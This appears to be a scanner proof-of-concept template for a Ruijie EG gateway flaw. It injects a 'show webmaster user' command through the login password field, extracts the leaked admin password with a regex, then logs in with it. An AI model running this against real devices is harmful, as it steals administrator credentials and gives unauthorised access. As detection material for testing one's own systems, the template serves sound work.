id: ruijie-eg-info-leak

info:
    name: Ruijie EG Information Disaclosure
    author: Search?=Null
    severity: medium

rules:
    r0:
        request:
            method: POST
            path: /login.php
            body: |
                username=admin&password=admin?show+webmaster+user
        expression: response.status == 200 && response.content_type.contains("text/json")
        output:
            search: '"{\"data\":\".*admin\\s?(?P<password>[^\\\\\"]*)".bsubmatch(response.body)'
            password: search["password"]
    r1:
        request:
            method: POST
            path: /login.php
            body: |
                username=admin&password={{password}}
        expression: response.status == 200 && response.content_type.contains("text/json") && response.raw_header.bcontains(b"user=admin") && response.raw_header.bcontains(b"Set-Cookie:") && response.body.bcontains(b"{\"data\":\"0\",\"status\":1}")
expression: r0() && r1()

